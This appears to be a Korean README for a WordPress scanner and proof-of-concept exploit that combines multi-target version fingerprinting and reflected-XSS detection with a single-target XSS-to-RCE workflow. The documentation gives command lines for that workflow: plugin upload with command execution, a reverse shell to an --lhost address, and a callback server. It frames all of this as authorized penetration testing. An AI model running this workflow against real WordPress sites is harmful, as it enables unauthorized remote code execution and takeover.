
여러 대상을 동시에 처리하며 버전 핑거프린팅, 반사형 XSS 탐지를 수행하고, 승인된 테스트를 위한 인증된 XSS-to-RCE 익스플로잇 워크플로우를 지원하는 WordPress 보안 스캐너입니다.
개발자: 크레딧: YogaGymn
승인된 WordPress 보안 테스트를 위한 PoC/스캐닝 유틸리티입니다. 이 프로젝트는 단일 타깃에 대한 익스플로잇 흐름과 동시 다중 타깃 스캔 전용 모드를 포함합니다.
중요: 이 프로젝트는 본인이 소유하거나 테스트에 대한 명시적 승인을 받은 WordPress 설치에서만 사용하십시오. 다중 타깃 스캐너는 의도적으로 버전 식별과 XSS 반사 탐지로 제한되며, 타깃 목록에 대해 자격 증명 캡처, 플러그인 업로드 또는 RCE를 수행하지 않습니다.
원본 스크립트는 다음을 지원합니다:
auto, xss 및 direct 모드.추가된 스캐너는 다음을 지원합니다:
ThreadPoolExecutor를 사용한 동시 스캐닝.다중 타깃 모드는 원본 RCE 함수를 호출하지 않습니다.
requests의존성을 설치하십시오:
python3 -m pip install requests
Linux 배포판에서 외부 관리형 Python 환경을 사용하는 경우, 가상 환경을 사용하십시오:
python3 -m venv .venv
source .venv/bin/activate
pip install requests
프로젝트를 클론하거나 복사하십시오: yogaGymn 익스플로잇 원본
git clone https://github.com/yogaGymn/XSS2Shell-CVE-2026-64638
cd XSS2Shell-CVE-2026-64638
또는 간단히 다음 파일을:
xss2shell.py
작업 디렉터리에 넣으십시오.
targets.txt OU alvos.txt라는 이름의 파일을 만드십시오:
https://example1.test
https://example2.test
https://example3.test
주석과 빈 줄은 무시됩니다:
# Alvos de laboratório autorizado
https://example1.test
https://example2.test
스캐너를 실행하십시오:
python3 xss2shell.py -i targets.txt
기본 동시성은 10개 worker입니다.
예를 들어, 20개 worker를 사용하려면:
python3 xss2shell.py -i targets.txt --workers 20
소규모 실습 환경의 경우:
python3 xss2shell.py -i targets.txt --workers 5
불필요하게 높은 workers 수를 선택하지 마십시오. 연결 부하가 증가하여 속도 제한(rate limit) 또는 방어적 제어가 트리거될 수 있습니다.
python3 xss2shell.py \
-i targets.txt \
--workers 10 \
--output results.txt
[*] Multiple-target scan: 3 target(s)
[*] Concurrent workers: 10
[*] Scan-only: WordPress fingerprint + XSS reflection check
[*] No login, plugin upload, credential capture, or RCE
[1/3] https://example1.test | WP=6.8.2 | XSS=XSS_NOT_DETECTED (ESCAPED)
[2/3] https://example2.test | WP=6.7.1 | XSS=XSS_REFLECTION_DETECTED (AREA_BYPASS)
[3/3] https://example3.test | WP=unknown | XSS=XSS_NOT_DETECTED (NOT_REFLECTED)
=======================================================
MULTIPLE-TARGET SCAN COMPLETE
=======================================================
Total targets : 3
XSS detected : 1
Not detected : 2
Errors : 0
Results saved : scan_results.txt
기본 scan_results.txt는 탭으로 구분된 필드를 사용합니다:
TARGET WORDPRESS_VERSION XSS_STATUS XSS_DETAIL
예시:
https://example1.test 6.8.2 XSS_NOT_DETECTED ESCAPED
https://example2.test 6.7.1 XSS_REFLECTION_DETECTED AREA_BYPASS
상태 의미
XSS_REFLECTION_DETECTED 스캐너가 테스트된 HTML 반사 동작을
탐지했습니다. 이는 그 자체만으로 RCE를
입증하지는 않습니다.
XSS_NOT_DETECTED 테스트된 반사(reflection)가 탐지되지
않았습니다.
ERROR 검사 중 예외가 발생했습니다.스캐너는 다음과 같은 세부 값을 보고할 수 있습니다:
RAW_HTMLAREA_BYPASSESCAPEDSTRIPPEDNOT_REFLECTED이 값들은 탐지 루틴이 관찰한 응답을 설명합니다. 결과를 확인된 취약점으로 간주하기 전에 수동으로 검증해야 합니다.
원본 스크립트는 단일 타깃 인수도 지원합니다.
python3 xss2shell.py \
-u admin \
-p 'PASSWORD' \
http://authorized-target.test
python3 xss2shell.py \
--mode direct \
-u admin \
-p 'PASSWORD' \
http://authorized-target.test
python3 xss2shell.py \
--mode xss \
--lhost 192.0.2.10 \
http://authorized-lab.test
XSS/직접 워크플로우는 명령 실행 기능을 포함하는 플러그인을 생성하거나 활성화할 수 있습니다. 승인된 테스트 환경에서만 사용하십시오.
usage: xss2shell.py [-h]
[-i TARGET_FILE] [--output OUTPUT] [--workers WORKERS]
[--mode {auto,xss,direct}]
[-u USERNAME] [-p PASSWORD]
[--lhost LHOST] [--lport LPORT]
[--slug SLUG] [--callback-port CALLBACK_PORT]
[--no-rev]
[target]
인수 설명
target 단일 타깃 URL.
-i, --input 여러 타깃이 포함된 파일.
--output 다중 타깃 결과용 출력 파일. 기본값:
scan_results.txt.
--workers 동시 worker 수. 기본값: 10.
--mode 원본 단일 타깃 모드: auto, xss 또는
direct.
-u, --username 원본 직접/대체(fallback) 워크플로우용
WordPress 사용자 이름.
-p, --password 원본 직접/대체 워크플로우용 WordPress
비밀번호.
--lhost 원본 PoC용 콜백/리버스 셸 호스트.
--lport 리버스 셸 포트. 기본값: 4444.
--slug 플러그인 슬러그. 기본값: xss2shell.
--callback-port 콜백 서버 포트. 기본값: 9090.
--no-rev 원본 워크플로우에서 리버스 셸 트리거를
건너뜁니다.다중 타깃 모드는 다음과 같은 Python 기능을 사용합니다:
ThreadPoolExecutor
각 타깃은 독립적인 스캔 작업으로 제출됩니다:
targets.txt
|
v
+----+----+----+----+
| T1 | T2 | T3 | T4 | ...
+----+----+----+----+
| | | |
v v v v
WP WP WP WP
XSS XSS XSS XSS
| | | |
+----+----+----+
|
v
scan_results.txt
결과는 작업이 완료되는 대로 수집되며, 최종 출력은 원래 타깃 순서에 따라 생성됩니다.
다중 타깃 모드는 승인된 보안 평가와 실습 환경을 위해 설계되었습니다.
권장 워크플로우:
targets.txt 파일에 포함하십시오.허가 없이 제3자 시스템에 스캐너를 사용하지 마십시오.
이 스캐너는 완전한 취약점 평가 도구가 아닙니다.
특히:
unknown(알 수 없음) 상태는 타깃이 취약하다는 의미가 아닙니다..
├── xss2shell.py
├── targets.txt
└── scan_results.txt
제공된 소스 코드에는 라이선스 정보가 없었습니다.
이 프로젝트를 공개적으로 게시하는 경우 LICENSE와 같은 명시적 라이선스 파일을 추가하십시오. 이 코드는 ZSecurity 원본 코드의 후속 개발물입니다.